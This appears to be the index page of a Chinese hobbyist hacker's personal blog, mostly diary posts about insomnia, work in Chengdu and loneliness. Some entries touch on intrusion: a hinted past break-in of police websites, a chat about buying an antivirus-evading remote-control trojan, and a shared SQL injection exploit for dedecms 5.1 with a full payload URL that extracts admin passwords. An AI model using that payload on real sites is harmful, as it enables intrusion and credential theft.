太子King’S Blog

貌似很久没有好好睡过了

刚躺下去 躺了好久 睡不着

爬起来看 都过了两个小时了

哎 半夜3：38分 失眠

完全睡不着啊。。无奈

工作时间的太自由 加上生物钟的完全打乱

额

我都不知道白天黑夜了

只知道

一个星期 过得蛮快的。。。 Read More

以前BLOG总是以技术为主

但是发现 没有更多的时间去转载或者写技术类文章

BLOG并不是完全的技术发表平台

所以

以后BLOG还是当成自己的空间

没事的时候

上来写写心情 发发牢骚还是好的。。。 Read More

Www.U6sec.Com

开放了

主要是提供一个交流的平台..

当然  针对不同的环境和人群 也有不同的隐藏内容… Read More

Dsquery Computer: Read the rest of this entry »

原本躺在床上写小说

一不小心到了夜郎社区（贵州论坛）闲逛

发现一则关于05年2月份入侵贵州公安厅及国家公安部的贴子

看着他的描述

猛感觉这事很熟悉

中间所写的给管理员发邮件 并且网站留名 联系方式

挑衅

貌似这事是自己做的

无奈收搜索下

居然还看到以前的记录

晚报报道的 猛一读
— Read the rest of this entry »

成都下雪了

只是一点小雪粒

在贵州看习惯了雪 对着成都的小雪粒反而没有感觉

一个人走在街上

雪粒打在肩上

很孤独寂寞的感觉

始终是一个人

一个人来

一个人走

一个人过

一个人

一个人。。。。 Read More

和NEW4不是很熟 没啥交情

不过跟狼总就熟了。U6必顶。

————————————————————————————–
堂堂暗组NEW4 都骗钱 可笑
这个是10-28的谈话
————————————
Sid Vicious 23:26:06
你们暗组不是有款远控么
Dark-D.S.T 23:26:41
嗯
Sid Vicious 23:28:06
MB 不出个VIP版?
Dark-D.S.T 23:28:42
有1200的
Sid Vicious 23:28:49
那么贵 日
Sid Vicious 23:32:09
你那里是不是真有卖啊
Dark-D.S.T 23:32:24
有的
Dark-D.S.T 23:32:35
1200 是第一次费用
Dark-D.S.T 23:32:53
以后每次升级免杀或者换版本 100的
Sid Vicious 23:33:08
升级免杀还要给钱?
Sid Vicious 23:33:21
我靠 那如果一个星期升级 3 4次免杀不得给300 400啊
Dark-D.S.T 23:33:30
单独编译的
Dark-D.S.T 23:44:36
特供版(价格视功能商议):采用0day启动项、无特征复制、文件自锁加固、函数动态加密、反虚拟机等技术完美通过国外顶级小红伞、及卡巴等杀毒软件。[该版本仅限于安全公司合作项目不对个人出售]
Read the rest of this entry »

郑重声明： Read More

内网渗透

这只是给自己一点小笔记，没有什么技术类大放送。纯粹给新手一点参考，如果是老手，就绕过吧。

相对来说 网上的资料少之又少 很少有人对内网渗透写出一些详细的资料以供同行们参考

今天在这 只是大致的讲一下内网的一些知识。

首先，我们会在什么情况下遇见内网？如果你的目标只局限于一个小WEB，那你完全不用考虑内网了。但是，如果你的目标是一个大WEB，或者一个大公司，那你就必须考虑内网的问题。

在我们的渗透过程中，很多大型网络的外部网站或是服务器不一定有用，当然外网也可以作为我们的一个突破口，毕竟没有经过尝试，我们也不知道里面的结构，至少在外部上我们可以获取一定的信息也说不定，但是对于内网，外网绝对不是我们的主要路径。很多时候我们直接从外网入手，想进入内网，已变得越来越困难。

那面对内网，我们应该怎样做呢？有些什么可利用的？或者有些什么方法？下面，我们就来一起讨论下。

渗透，本身就是一个信息收集，然后分类归档，技术利用，从而达到目标。

那我们拿到一个内网的机器时，我们首要要做的事情就是要进入信息的收集，什么信息？很多。。。 Read the rest of this entry »

今天RAINY说他有了新的DEDE 注射漏洞

不过还存在一点小问题

经过测试  确定可用  

特此作者说共享

————————————————
发现者:Rainy'Fox&St0p
Tems:二胖子网安(http://bbs.erpangzi.com)

影响版本:
dedecms GBK 5.1

漏洞描述:
文件:plus/feedback_js.php
if(empty($arcID))
{
    $row = $dlist->dsql->GetOne(“Select id From `#@__cache_feedbackurl` where url='$arcurl' “);
    if(is_array($row)) $urlindex = $row['id'];
}

获得变量arcurl,直接放入数据库查询.导致注入产生,介于对于php环境如果设置了magic_quote_gpc=on的问题.可以结合php多字节编码漏洞构造.

利用地址:
http://localhost/plus/feedback_js.php?arcurl=%cf' union select “' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 as msg from dede_admin where 1=1 union select * from dede_feedback d where 1=2  and ''='” from dede_admin where ''='

经过测试，得出结论，magic_quotes_gpc = On的时候目前语句还不行,编码尚未突破 Read More

9月9号来的成都

当时来得挺急的 就和朋友通了个电话

第二天就飞机到成都了

成都是个不错的城市

因为语言和贵州相差不大

所以选择这里也是有原因的

再者成都离家也近 回家方便

最主要是

成都是吃川菜

这可爽了我喜欢吃川菜的肚子

来成都上班 还算比较好

试用期是2K 包吃包住

在一家安全公司上班

做的也是平时那些事

领导和同事都比较容易相处

所以 工作 生活 都比较开心

马上试用期就要完了

也不知道下面能不能通过

个人感觉

这边条件不错

倒挺想在这呆下去 好好发展

项目的难度也很大

需要一定的基础 和不断的研究



成都吃 喝 玩都好 消费也是有高有低 个人感觉比较适合的

但是唯一不好就是一会冷一会热

而且天空随时雾蒙蒙的 晚上几乎看不到月亮

我来了这么久 就看过两次还是三次

可能是我不出门

不过有月光的晚上 我想 应该很容易看出来的。。。

来成都玩了武候祠 锦里 公园 古镇

也吃了很多当地相当出名的菜

还去加州酒店游泳 不过消费不是我平常能消费得起的

我可没有拿200块游两三个小时泳的习惯。。

总体说

成都 确实是个不错的城市

如果天空能亮一点 天气能好一点 路上的车能少一点

成都就非常不错了。。。

闪了。。明天要上班


早点睡了。。。 Read More

本人也做百度AD Read More

巨大财富的背后,都隐藏着罪恶。

让朋友低估你的优点，让敌人高估你的缺点。

不要憎恨你的敌人,那会影响你的判断力

离你的朋友近些，但离你的敌人要更近，这样你才能更了解他。
Read More

你说我是黑X，我没技术

你说我是安全员，我没资格

我只是大家常说的一个爱好者而已

只是各自喜欢的领域不一样

从02年开始

作了这么多年

别人看电影时，我在学习东西

别人在玩游戏时，我在看游戏代码

别人还在靠父母供养时，我们在学习如何赚钱

总是在别人开始起床的时候才钻进被窝

没有日夜黑白，没有时间概念，饮食没有规律

除了拥有别人有的，我们还拥有了别人没有的

比如身上的XX零件功能不太好

身体正面永远面对显示器

眼睛不断老化近视

除了那些黑白彩色，一行行的代码外，没有别的东西

我的左手和右手除了键盘鼠标，就只剩下香烟，咖啡

谈恋爱，不懂浪漫

找对象，不懂情调

对象找不到，相亲相不到

家人天天骂，对象天天烦

说实话

玩到最后给我的感觉就是

我们玩的不是技术，其实，我们玩的是寂寞。 Read More